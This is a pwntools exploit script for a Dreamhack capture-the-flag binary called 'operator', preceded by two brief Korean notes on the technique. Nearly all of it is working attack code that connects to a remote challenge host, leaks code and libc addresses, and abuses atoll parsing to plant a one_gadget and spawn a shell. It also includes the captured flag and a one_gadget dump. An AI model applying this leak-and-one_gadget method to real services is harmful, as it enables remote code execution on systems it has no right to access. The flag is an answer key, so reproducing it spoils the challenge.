- atoll이 유효한 바이트까지만 읽는다. -> 이를 이용해서 숫자 넣는 곳에 one_gadget을 넣을 수 있다.
- rbp offset 7을 1bit flip 하면 과거에 써놨던 one_gadget의 주소로 점프할 수 있다.
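from pwn import *

context.log_level = "debug"

# Target selection: `python3 exploit.py LOCAL` runs ./operator with the
# challenge libc preloaded; with no argument the remote instance is used
# (the original behaviour).
HOST, PORT = "host8.dreamhack.games", 9771
if args.LOCAL:
    io = process("./operator", env={"LD_PRELOAD": "./libc.so.6"})
else:
    io = remote(HOST, PORT)
libc = ELF("./libc.so.6", checksec=False)
e = ELF("./operator", checksec=False)

# one_gadget offsets for this exact libc build (the one_gadget dump with each
# gadget's register constraints is at the bottom of this file). They are
# meaningless for any other libc; re-run one_gadget if libc.so.6 changes.
one = [0xEBCF1, 0xEBCF5, 0xEBCF8, 0xEBD52, 0xEBDA8, 0xEBDAF, 0xEBDB3]

# Offsets recovered by debugging this binary/libc pair; re-derive them if
# either file changes.
PIE_LEAK_OFF = 0x2008    # leaked code pointer minus the code base
LIBC_LEAK_OFF = 0x620D0  # leaked libc pointer minus the libc base
TARGET_OFF = 0x4150      # code-base-relative pointer placed in the final payload


def leak_ptr():
    """Read a 6-byte little-endian pointer from `io` and zero-extend it to 64 bits."""
    return u64(io.recvn(6).ljust(8, b"\x00"))


def check_base(name, base):
    """Abort if `base` is not page-aligned.

    A mis-parsed leak or a stale offset almost always yields a base that is
    not 0x1000-aligned; failing here is clearer than firing a garbage
    one_gadget address at the service.  `log.error` raises, so this never
    returns on failure.
    """
    if base & 0xFFF:
        log.error(f"{name} base {hex(base)} is not page-aligned; leak offset is wrong")


# Step 1: fill the buffer with a cyclic pattern and read back past it to
# leak a code pointer, which gives the PIE base.
io.sendafter(b">> ", b"1")
io.sendafter(b">> ", cyclic(0x1000))
io.sendafter(b">> ", b"1")
io.recvuntil(cyclic(0x1000))
pie = leak_ptr() - PIE_LEAK_OFF
check_base("code", pie)
log.info(f"code base: {hex(pie)}")

# Step 2: leak a libc pointer through menu 2 / option 2 and derive the libc base.
io.sendlineafter(b">> ", b"2")
io.sendlineafter(b">> ", b"2")
io.sendafter(b": ", b"48")
io.sendlineafter(b": ", b"6")
io.recvline()
io.recvline()
libc_base = leak_ptr() - LIBC_LEAK_OFF
check_base("libc", libc_base)
log.info(f"libc base: {hex(libc_base)}")

# Step 3: plant the one_gadget.  atoll() stops at the first non-digit byte,
# so only the leading "7" is parsed as the number and the bytes after it are
# presumably stored raw in the same buffer.  The first 8 bytes form a
# little-endian qword whose low byte is 0x37 ('7') followed by the upper
# 7 bytes of pie+TARGET_OFF; the next 6 bytes are the low 6 bytes of the
# one_gadget address (canonical user-space addresses fit in 6 bytes).
# one[1] is 0xebcf5, which requires r10 and rdx to be NULL or valid
# argv/envp pointers and rbp-0x78 to be writable -- see the dump below.
io.sendline(b"1")
io.sendlineafter(b">> ", b"\x00" * 0x300)
io.sendline(b"2")
io.sendlineafter(b": ", b"40")
io.sendafter(b": ", b"7" + p64(pie + TARGET_OFF)[1:] + p64(libc_base + one[1])[:-2])
io.sendline(b"0")
io.interactive()
# DH{ac9becb710055fcb6b67bfe1c1ee3f2c5a24a04c5ca8d22f77665ac525579f4d}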
# one_gadget output for ./libc.so.6.  The offsets in `one` above are taken
# from this dump; the exploit uses one[1] (0xebcf5), so its constraints on
# rbp-0x78, r10 and rdx are the ones that must hold at the time of the jump.
"""
0xebcf1 execve("/bin/sh", r10, [rbp-0x70])
constraints:
address rbp-0x78 is writable
[r10] == NULL || r10 == NULL || r10 is a valid argv
[[rbp-0x70]] == NULL || [rbp-0x70] == NULL || [rbp-0x70] is a valid envp
0xebcf5 execve("/bin/sh", r10, rdx)
constraints:
address rbp-0x78 is writable
[r10] == NULL || r10 == NULL || r10 is a valid argv
[rdx] == NULL || rdx == NULL || rdx is a valid envp
0xebcf8 execve("/bin/sh", rsi, rdx)
constraints:
address rbp-0x78 is writable
[rsi] == NULL || rsi == NULL || rsi is a valid argv
[rdx] == NULL || rdx == NULL || rdx is a valid envp
0xebd52 execve("/bin/sh", rbp-0x50, r12)
constraints:
address rbp-0x48 is writable
r13 == NULL || {"/bin/sh", r13, NULL} is a valid argv
[r12] == NULL || r12 == NULL || r12 is a valid envp
0xebda8 execve("/bin/sh", rbp-0x50, [rbp-0x70])
constraints:
address rbp-0x48 is writable
r12 == NULL || {"/bin/sh", r12, NULL} is a valid argv
[[rbp-0x70]] == NULL || [rbp-0x70] == NULL || [rbp-0x70] is a valid envp
0xebdaf execve("/bin/sh", rbp-0x50, [rbp-0x70])
constraints:
address rbp-0x48 is writable
rax == NULL || {rax, r12, NULL} is a valid argv
[[rbp-0x70]] == NULL || [rbp-0x70] == NULL || [rbp-0x70] is a valid envp
0xebdb3 execve("/bin/sh", rbp-0x50, [rbp-0x70])
constraints:
address rbp-0x50 is writable
rax == NULL || {rax, [rbp-0x48], NULL} is a valid argv
[[rbp-0x70]] == NULL || [rbp-0x70] == NULL || [rbp-0x70] is a valid envp
"""